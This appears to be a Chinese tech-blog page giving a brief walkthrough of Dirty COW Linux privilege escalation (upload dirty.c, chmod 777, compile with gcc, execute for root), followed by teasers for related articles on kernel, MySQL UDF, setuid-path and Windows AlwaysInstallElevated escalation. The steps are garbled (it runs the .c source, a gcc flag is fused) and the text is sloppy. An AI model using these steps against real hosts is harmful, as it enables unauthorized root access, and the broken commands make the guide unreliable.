脏牛提权 liunx

2023-10-25 21:20
文章标签 liunx 提权 脏牛

本文主要是介绍脏牛提权 liunx,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

使用方法   

Liunx

普通用户      

内核版本  在版本里  我直接脏牛提权     有脚本查看内核版本   

上传c脚本   编译   直接执行 获取高权限

 提权

  

Liunx  

https://github.com/InteliSecureLabs/Linux Exploit Suggester    运行这个脚本  上传到客户端

https://github.com/InteliSecureLabs/Linux%20Exploit%20Suggester     命令字提权  

liunx有一个稳定连接

ll   查看    检测可使用的漏洞    

chmod  777   liunx 脚本 

执行脚本

脏牛漏洞版本

上传藏牛漏洞  

Chmod  777   dirty.c    给权限

编译以下脚本

gcc -pthread dirty.c-o dirty -lcrypt

执行 ./ dirty.c

开始提权  

提完权之后   

提权步骤

  

这篇关于脏牛提权 liunx的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/285262

相关文章

linux 内核提权总结(demo+exp分析) -- 任意读写(四)

hijack_modprobe_path篇 本文转自网络文章,内容均为非盈利,版权归原作者所有。 转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。 原文作者:jmpcall 专栏地址:https://zhuanlan.kanxue.com/user-815036.htm     原理同hijack_prctl, 当用户执行错误格式的elf文件时内核调用call_usermod

linux 内核提权总结(demo+exp分析) -- 任意读写(三)

hijack_prctl篇 本文转自网络文章,内容均为非盈利,版权归原作者所有。 转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。 原文作者:jmpcall 专栏地址:https://zhuanlan.kanxue.com/user-815036.htm   prctl函数: 用户态函数,可用于定制进程参数,非常适合和内核进行交互 用户态执行prctl函数后触发prctl系统

linux 内核提权总结(demo+exp分析) -- 任意读写(二)

hijack_vdso篇 本文转自网络文章,内容均为非盈利,版权归原作者所有。 转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。 原文作者:jmpcall 专栏地址:https://zhuanlan.kanxue.com/user-815036.htm     vdso: 内核实现的一个动态库,存在于内核,然后映射到用户态空间,可由用户态直接调用 内核中的vdso如果被修改

linux 内核提权总结(demo+exp分析) -- 任意读写(一)

cred篇 本文转自网络文章,内容均为非盈利,版权归原作者所有。 转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。 原文作者:jmpcall 专栏地址:https://zhuanlan.kanxue.com/user-815036.htm   每个线程在内核中都对应一个线程结构块thread_infothread_info中存在task_struct类型结构体 struct t

linux 内核提权总结(demo+exp分析) -- ROP(二)

ret2usr CR4篇 本文转自网络文章,内容均为非盈利,版权归原作者所有。 转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。 原文作者:jmpcall 专栏地址:https://zhuanlan.kanxue.com/user-815036.htm   smep: smep是内核的一种保护措施, 使得内核不可执行用户态代码 内核通过CR4寄存器的第20位来控制smep,

linux 内核提权总结(demo+exp分析) -- ROP(一)

基础ROP篇(linux 5.0.21) 本文转自网络文章,内容均为非盈利,版权归原作者所有。 转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。 原文作者:jmpcall 专栏地址:https://zhuanlan.kanxue.com/user-815036.htm   内核提权与用户态攻击的区别 攻击流程 用户态攻击: 执行 system("/bin/sh") 获得shel

MySQL之UDF提权复现

什么是UDF: UDF(Userfined function)用户自定义函数,是MySQL的一个扩展接口,用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用。 提权条件: 知道MySQL用户名和密码,可以登录MySQL有写入文件权限,即 secure_file_priv 的值为空 注意:使用 UDF 提权是在没有获取到 webshel

在liunx下原本是不支持rar文件的,需要安装liunx下的winrar版本

操作如下 wget http://www.rarsoft.com/rar/rarlinux-4.0.1.tar.gz tar -zxvf rarlinux-4.0.1.tar.gz cd rar  make 看见下面这些信息就是安装成功了 mkdir -p /usr/local/bin mkdir -p /usr/local/lib cp rar unrar /usr/local/bin c

WEB渗透Linux提权篇-环境变量提权

往期文章  WEB渗透Linux提权篇-提权工具合集-CSDN博客   第一种 假设存在一个脚本代码为 #include<unistd.h>void main(){setuid(0);setgid(0);system("ps");} 编译>gcc demo.c -o shell>chmod u+s shell执行./shell 回显ps命令提权find / -per

WEB渗透Win提权篇-合集(下)

完整20w字笔记: 夸克网盘分享  AlwaysInstallElevated提权 >reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v Alw